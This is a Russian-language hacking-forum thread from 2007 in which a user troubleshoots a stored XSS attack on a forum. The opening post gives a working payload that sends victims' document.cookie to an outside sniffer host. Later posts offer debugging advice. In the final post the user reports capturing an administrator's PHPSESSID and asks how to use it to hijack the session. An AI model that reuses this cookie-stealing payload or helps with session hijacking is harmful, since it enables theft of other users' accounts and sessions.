HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Уязвимости CMS / форумов
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Подскажите
  #1  
Старый 09.09.2007, 17:30
Perec333
Новичок
Регистрация: 07.09.2007
Сообщений: 6
С нами: 9829249

Репутация: 0
По умолчанию Подскажите

Подскажите плиз, почему на эту ссылку, на снифак приходят тока мои куки(xss в теме сообщения)
<script>img = new Image(); img.src = "http://s.netsec.ru/mda.gif?"+document.cookie;</script>
 
Ответить с цитированием

  #2  
Старый 09.09.2007, 18:40
0nep@t0p
Участник форума
Регистрация: 25.05.2007
Сообщений: 147
С нами: 9981026

Репутация: 728
По умолчанию

Хм, наверное потому что пока только ты просмотрел эту тему
 
Ответить с цитированием

  #3  
Старый 09.09.2007, 18:52
inlanger
Познавший АНТИЧАТ
Регистрация: 07.01.2007
Сообщений: 1,263
С нами: 10179806

Репутация: 702


По умолчанию

Цитата:
"http://s.netsec.ru/mda.gif?"
вместо mda.gif впиши свой_ник.gif
 
Ответить с цитированием

  #4  
Старый 09.09.2007, 21:27
Perec333
Новичок
Регистрация: 07.09.2007
Сообщений: 6
С нами: 9829249

Репутация: 0
По умолчанию

я конечно не знаток в хаке но со сниффером справиться могу и сообщение мои читали(так как на них отвечали))) Есть еще предложения?)) Вот еще зашел под другим пользователем посмотрел письмо с xss которое я отправил от другово своего пользователи, кукисы пришли, как будто на сниф только мои приходят

Последний раз редактировалось Perec333; 09.09.2007 в 21:57..
 
Ответить с цитированием

  #5  
Старый 10.09.2007, 11:14
blackybr
♠ ♦ ♣ ♥
Регистрация: 18.05.2006
Сообщений: 1,828
С нами: 10516826

Репутация: 3742


По умолчанию

Сомневаюсь в подобном раскладе. Если они все таки заходят, то не может быть в принципе что твои приходят, а их нет.
__________________
Привет! Меня зовут Джордж, и я хотел бы рассказать вам про реинкарнацию (ц) 2x2
 
Ответить с цитированием

  #6  
Старый 10.09.2007, 11:22
cardons
Познавший АНТИЧАТ
Регистрация: 19.07.2005
Сообщений: 1,000
С нами: 10953026

Репутация: 950


По умолчанию

Цитата:
Сообщение от Perec333  
я конечно не знаток в хаке но со сниффером справиться могу и сообщение мои читали(так как на них отвечали))) Есть еще предложения?)) Вот еще зашел под другим пользователем посмотрел письмо с xss которое я отправил от другово своего пользователи, кукисы пришли, как будто на сниф только мои приходят
А ты недумал что в некоторвх браузерах XSS непашет
 
Ответить с цитированием

  #7  
Старый 10.09.2007, 15:43
Perec333
Новичок
Регистрация: 07.09.2007
Сообщений: 6
С нами: 9829249

Репутация: 0
По умолчанию

Дык не на одном человеке проверял, у всех непохать не может))))
 
Ответить с цитированием

  #8  
Старый 10.09.2007, 22:22
Perec333
Новичок
Регистрация: 07.09.2007
Сообщений: 6
С нами: 9829249

Репутация: 0
По умолчанию

наконецто поймал кукисы но тут возник другой вопрос, поймал PHPSESSID админа через инеткрэк послал пакет , посмотрел его страницу в инет креке, как я могу это использовать?в кукисах PHPSESSID не нахожу, они создаются тока когда ставишь галочку на "запомнить мнея" в виде login- xxxx pass-md5(xxx) а PHPSESSID нету...
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Подскажите Proxy $ZLO$ Болталка 3 06.02.2005 14:29



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.